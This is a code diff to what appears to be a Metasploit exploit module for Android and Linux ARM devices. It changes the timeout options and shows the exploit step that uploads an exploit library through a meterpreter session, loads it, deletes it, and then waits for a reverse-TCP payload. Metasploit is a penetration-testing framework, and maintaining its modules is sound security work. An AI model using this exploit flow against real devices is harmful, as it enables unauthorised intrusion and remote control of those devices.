@@ -34,11 +34,11 @@ def initialize(info={})
34
34
] ,
35
35
'DisclosureDate' => "May 03 2014" ,
36
36
'SessionTypes' => [ 'meterpreter' ] ,
37
- " Platform" => [ "android" , "linux" ] ,
37
+ ' Platform' => [ "android" , "linux" ] ,
38
38
'Payload' => { 'Space' => 2048 , } ,
39
- "Arch" => ARCH_ARMLE ,
40
39
'DefaultOptions' =>
41
40
{
41
+ 'WfsDelay' => 300 ,
42
42
'PAYLOAD' => 'linux/armle/mettle/reverse_tcp' ,
43
43
} ,
44
44
'DefaultTarget' => 0 ,
@@ -88,10 +88,6 @@ def initialize(info={})
88
88
]
89
89
}
90
90
) )
91
- register_options (
92
- [
93
- OptInt . new ( "ListenerTimeout" , [ true , "The maximum number of seconds to wait for a session" , 300 ] )
94
- ] , self . class )
95
91
end
96
92
97
93
def exploit
@@ -162,20 +158,16 @@ def exploit
162
158
write_file ( remote_file , exploit_data )
163
159
164
160
print_status ( "Loading exploit library #{ remote_file } " )
165
- old_timeout = session . response_timeout
166
- print_status ( "Be patient, this exploit will automatically timeout after #{ datastore [ 'ListenerTimeout' ] } seconds" )
167
- session . response_timeout = datastore [ 'ListenerTimeout' ]
168
161
session . core . load_library (
169
162
'LibraryFilePath' => local_file ,
170
163
'TargetFilePath' => remote_file ,
171
164
'UploadLibrary' => false ,
172
165
'Extension' => false ,
173
166
'SaveToDisk' => false
174
167
)
175
- session . response_timeout = old_timeout
176
- print_status ( "Loaded library #{ remote_file } " )
168
+ print_status ( "Loaded library #{ remote_file } , deleting" )
177
169
session . fs . file . rm ( remote_file )
178
- print_status ( "Library #{ remote_file } was deleted " )
170
+ print_status ( "Waiting #{ datastore [ 'WfsDelay' ] } seconds for payload " )
179
171
end
180
172
end
181
173
0 commit comments